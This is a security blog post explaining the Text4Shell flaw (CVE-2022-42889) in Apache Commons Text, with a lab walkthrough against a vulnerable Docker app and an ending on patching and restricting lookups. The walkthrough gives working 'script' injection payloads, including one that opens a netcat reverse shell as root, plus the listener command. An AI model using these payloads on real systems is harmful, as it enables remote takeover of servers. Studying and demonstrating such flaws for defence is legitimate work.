CVE-2022-42889 Text4Shell Vulnerability

Marvinalaric
MII Cyber Security Consulting Services
4 min read · Dec 13, 2022
Apache

Apache Commons Text

Apache Commons Text is a library focused on algorithms for working with Strings; it contains a number of useful utility methods beyond what core Java offers.

In early October an Apache Commons Text vulnerability was published (CVE-2022-42889). In the National Vulnerability Database this vulnerability has a base score of 9.8 with the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. From the vector we can conclude that this vulnerability is very dangerous: in short, the attack can be carried out over the network, it is easy to exploit, it requires no privileges and no interaction from another user, and it has a high impact on confidentiality, integrity and availability.

Text4Shell is a vulnerability that affects the Apache Commons Text library. The library serves as a text manipulation toolkit in which the user can apply string substitution to change and replace text. The actual vulnerability lies in Commons Text’s variable interpolation: the default interpolator allows string lookups that can lead to remote code execution.

The affected versions are 1.5 through 1.9, and the affected interpolators are ‘script’, ‘dns’, and ‘url’. Successful exploitation of this vulnerability with a crafted request can give full control over the vulnerable system.

Example

For this simulation, I am using my Kali machine and running the vulnerable app (https://github.com/karthikuj/cve-2022-42889-text4shell-docker) in my Docker environment. When you see the image below, that means your Docker is up and running.

Vulnerable Target

Now all we need is to send the exploit code. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation.

Let’s try the first prefix, “script”:

${script:javascript:java.lang.Runtime.getRuntime()exec(‘’)}

For the exec we will try a basic one: creating a blank file named hamsa with the ‘touch’ command in the /root directory. The payload will look like this:

${script:javascript:java.lang.Runtime.getRuntime()exec(‘touch /tmp/hamsa’)}

Now input the payload in the ‘search’ parameter. If a 400 Bad Request occurs, it means we need to URL-encode the payload first.

400 Bad Request

%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime()exec(‘touch %2Fhamsa%2F’)}

After this we can jump into our Docker container and check the file in the root folder; as we can see, there is a hamsa file.

Success
File Created

Now let’s try to get a connection from the target using this payload, where the IP is the Docker’s IP. And don’t forget to URL-encode the payload.

${script:javascript:java.lang.Runtime.getRuntime()exec(‘nc 172.17.0.1 7777 -e /bin/bash’)}

Now we need to use netcat as the listener:

nc -lvnp 7777

Listening on 7777

After entering the payload in the search parameter, we get a connection to the target as the root user.

Run the Payload
Success to Connect

Mitigation

Update Apache Commons Text to the latest version (1.10).
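The interpolation mechanism described above and this mitigation, as an added example that is not part of the original post or of Commons Text itself: the weak configuration that versions 1.5–1.9 produced by default, next to a hardened one that registers only the lookups the application needs. The class name SafeInterpolation, the allowed prefixes (sys, env) and the sample input are assumptions.

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class SafeInterpolation {

    // Weak configuration: on Commons Text 1.5-1.9 the default interpolator
    // registers every built-in lookup, including "script", "dns" and "url",
    // so untrusted input reaching replace() can trigger those lookups.
    static StringSubstitutor weak() {
        return new StringSubstitutor(
            StringLookupFactory.INSTANCE.interpolatorStringLookup());
    }

    // Hardened configuration: allowlist only the prefixes the application
    // really uses and pass addDefaultLookups=false, so "script", "dns",
    // "url" and every other unlisted prefix cannot be resolved at all.
    static StringSubstitutor hardened() {
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("sys", StringLookupFactory.INSTANCE.systemPropertyStringLookup());
        allowed.put("env", StringLookupFactory.INSTANCE.environmentVariableStringLookup());
        StringLookup interpolator =
            StringLookupFactory.INSTANCE.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(interpolator);
    }

    public static void main(String[] args) {
        // Constructed sample input: one legitimate "sys" reference plus a
        // placeholder using a prefix that is not on the allowlist.
        String input = "java=${sys:java.version} other=${script:javascript:1+1}";

        // With the restricted interpolator "sys" is resolved, while the
        // "script" placeholder is left in the output as literal text
        // because no lookup is registered for that prefix.
        System.out.println(hardened().replace(input));
    }
}
```

Commons Text 1.10.0 removes script, dns and url from the default lookup set, but an explicit allowlist like the one above still limits what any future default can expose. Also verify with a harmless probe such as the sample above that placeholders with unlisted prefixes pass through unresolved after upgrading.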
